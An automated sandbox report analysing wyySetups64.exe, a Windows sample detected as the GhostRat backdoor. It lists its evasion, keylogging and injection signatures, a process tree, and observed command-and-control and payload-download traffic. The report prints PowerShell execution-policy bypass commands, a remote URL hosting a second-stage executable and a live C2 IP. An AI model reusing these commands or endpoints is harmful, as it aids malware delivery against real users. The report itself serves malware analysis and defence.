Windows Analysis Report
wyySetups64.exe

Overview

General Information

Sample name: wyySetups64.exe
Analysis ID: 1581895
MD5: 97090426a42466d139d3e45f47c652f8
SHA1: c3500a1e6db48e87c2ba73bbb5ccc23ec31bbc2c
SHA256: e70179810f8c851e20966da1e5e1bb45dfc603c068864192c43eb161ce7abbd9
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009
Infos:

Detection

GhostRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Bypasses PowerShell execution policy
Checks if browser processes are running
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Queries disk data (e.g. SMART data)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wyySetups64.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\wyySetups64.exe" MD5: 97090426A42466D139D3E45F47C652F8)
    • wyySetups64.exe (PID: 3624 cmdline: "C:\Users\user\AppData\Roaming\wyySetups64.exe" MD5: 97090426A42466D139D3E45F47C652F8)
      • cmd.exe (PID: 1136 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2008 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 6036 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3928 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • 360instpatch.exe (PID: 4460 cmdline: C:\Users\user\Downloads\360instpatch.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)
  • 360instpatch.exe (PID: 3192 cmdline: C:\Users\user\Downloads\360instpatch.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)
  • svchost.exe (PID: 3808 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: wyySetups64.exe PID: 3624 | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
    Source: Process started | Author: frack113 | Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 2008, ProcessName: powershell.exe
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 2008, ProcessName: powershell.exe
    Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3808, ProcessName: svchost.exe
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-12-29T09:02:09.456478+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 118.107.44.219 | 19091 | TCP
    2024-12-29T09:03:19.528655+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 118.107.44.219 | 19091 | TCP
    2024-12-29T09:04:30.575700+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49891 | 118.107.44.219 | 19092 | TCP
    2024-12-29T09:05:42.606786+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 50026 | 118.107.44.219 | 19091 | TCP

    AV Detection

    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.1% probability

    Compliance

    Source: C:\Users\user\Desktop\wyySetups64.exe | Unpacked PE file: 0.2.wyySetups64.exe.400000.0.unpack
    Source: wyySetups64.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
    Source: unknown | HTTPS traffic detected: 149.129.12.34:443 -> 192.168.2.4:49735 version: TLS 1.2
    Source: wyySetups64.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: \Release\Code_Shellcode.pdb source: wyySetups64.exe, wyySetups64.exe, 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.dr
    Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, sites.dll.8.dr
    Source: Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: wyySetups64.exe, 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.dr
    Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, sites.dll.8.dr
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: z:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: x:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: v:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: t:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: r:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: p:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: n:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: l:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: j:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: h:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: f:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: b:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: y:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: w:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: u:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: s:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: q:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: o:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: m:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: k:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: i:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: g:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: e:
    Source: C:\Windows\System32\svchost.exe | File opened: c:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | File opened: [:
    Source: C:\Users\user\Downloads\360instpatch.exe | Code function: 8_2_00B6D71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,8_2_00B6D71E
    Source: C:\Users\user\Downloads\360instpatch.exe | Code function: 8_2_00B7D670 _memset,FindFirstFileW,FindNextFileW,FindClose,8_2_00B7D670
    Source: C:\Users\user\Downloads\360instpatch.exe | Code function: 8_2_00B73FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00B73FB0
    Source: C:\Users\user\Downloads\360instpatch.exe | Code function: 8_2_6BF3A6BA _wcspbrk,__getdrive,FindFirstFileW,_wcspbrk,__wfullpath_helper,_wcslen,GetDriveTypeW,___loctotime64_t,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,8_2_6BF3A6BA
    Source: C:\Users\user\Downloads\360instpatch.exe | Code function: 8_2_6CD3E2B7 FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,8_2_6CD3E2B7
    Source: C:\Users\user\Downloads\360instpatch.exe | Code function: 9_2_00B7D670 _memset,FindFirstFileW,FindNextFileW,FindClose,9_2_00B7D670
    Source: C:\Users\user\Downloads\360instpatch.exe | Code function: 9_2_00B6D71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,9_2_00B6D71E
    Source: C:\Users\user\Downloads\360instpatch.exe | Code function: 9_2_00B73FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,9_2_00B73FB0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe | Code function: 1_2_033780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,1_2_033780F0

    Networking

    Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49738 -> 118.107.44.219:19091
    Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49744 -> 118.107.44.219:19091
    Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49891 -> 118.107.44.219:19092
    Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50026 -> 118.107.44.219:19091
    Source: global traffic | TCP traffic: 118.107.44.219 ports 18852,8853,19092,19091,3,5,8
    Source: global traffic | TCP traffic: 192.168.2.4:49733 -> 118.107.44.219:8853
    Source: global traffic | UDP traffic: 192.168.2.4:23363 -> 1.192.136.170:3478
    Source: global traffic | UDP traffic: 192.168.2.4:23363 -> 1.192.136.171:3478
    Source: global traffic | UDP traffic: 192.168.2.4:23363 -> 8.46.123.189:15054
    Source: global traffic | HTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1 | Host: s.360.cn | Connection: Keep-Alive | Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4187&downrate=0&downlen=0 HTTP/1.1 | Host: s.360.cn | Connection: Keep-Alive | Cache-Control: no-cache
    Source: Joe Sandbox View | IP Address: 180.163.251.230 180.163.251.230
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global traffic | HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: s.360.cn | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: s.360.cn | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: s.360.cn | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: s.360.cn | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: s.360.cn | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: s.360.cn | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: s.360.cn | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /360safe/h_inst.cab?rd=36608336 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) | Host: pinst.360.cn | Connection: Close | Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: s.360.cn | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: s.360.cn | Connection: Keep-Alive
    Source: unknown | TCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: C:\Users\user\Desktop\wyySetups64.exe | Code function: 0_2_10001BB0 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,exit,0_2_10001BB0
    Source: global traffic | HTTP traffic detected: GET /360instpatch.exe HTTP/1.1 | User-Agent: URLDownloader | Host: gwwifha84989.oss-ap-northeast-2.aliyuncs.com | Cache-Control: no-cache
    Source: global traffic | DNS traffic detected: DNS query: gwwifha84989.oss-ap-northeast-2.aliyuncs.com
    Source: global traffic | DNS traffic detected: DNS query: s.360.cn
    Source: global traffic | DNS traffic detected: DNS query: st.p.360.cn
    Source: global traffic | DNS traffic detected: DNS query: agt.p.360.cn
    Source: global traffic | DNS traffic detected: DNS query: tr.p.360.cn
    Source: global traffic | DNS traffic detected: DNS query: agd.p.360.cn
    Source: global traffic | DNS traffic detected: DNS query: pinst.360.cn
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: powershell.exe, 00000006.00000002.1780265823.0000000007AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://www.symauth.com/cps0(
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://www.symauth.com/rpa00
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
    Source: powershell.exe, 00000006.00000002.1774677766.0000000005531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1765795867.0000000004838000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1765795867.0000000004825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBqq
    Source: 360instpatch.exeString found in binary or memory: https://bbs.360.cn/thread-16079507-1-1.html
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: https://bbs.360.cn/thread-16079507-1-1.htmlD
    Source: powershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: https://d.symcb.com/cps0%
    Source: 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: https://d.symcb.com/rpa0
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.drString found in binary or memory: https://d.symcb.com/rpa0.
